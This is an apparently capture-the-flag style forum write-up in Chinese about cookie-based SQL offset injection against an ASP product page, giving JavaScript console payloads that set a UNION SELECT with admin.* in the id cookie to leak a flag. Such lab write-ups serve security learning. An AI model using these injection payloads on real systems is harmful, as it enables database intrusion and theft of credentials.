Web5 - 偏移注入

kim23   ·   发表于 2019-11-06 17:18:45   ·   技术文章投稿区

进入产品中心 


就这样子



利用cookie注入所学  测试字段  实测字段为26  

在控制台进行偏移注入:




然后再另外一个页面访问:http://59.63.200.79:8004/ProductShow.asp
可以看到,select语句中的25 显示在了图片img标签的src属性值中:

可以看到突破口在25字段


然后poc语句  


alert(document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,admin.*,26"))

进行多次偏移注入后 


得到以下语句

 alert(document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,admin.*,26 from admin"))


刷新 http://59.63.200.79:8004/ProductShow.asp页面 


在img src中  得到Flag



打赏我,让我更有动力~

1 Reply   |  Until 2019-11-8 | 1056 View

holic
发表于 2019-11-8

你是不是写错地方了

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.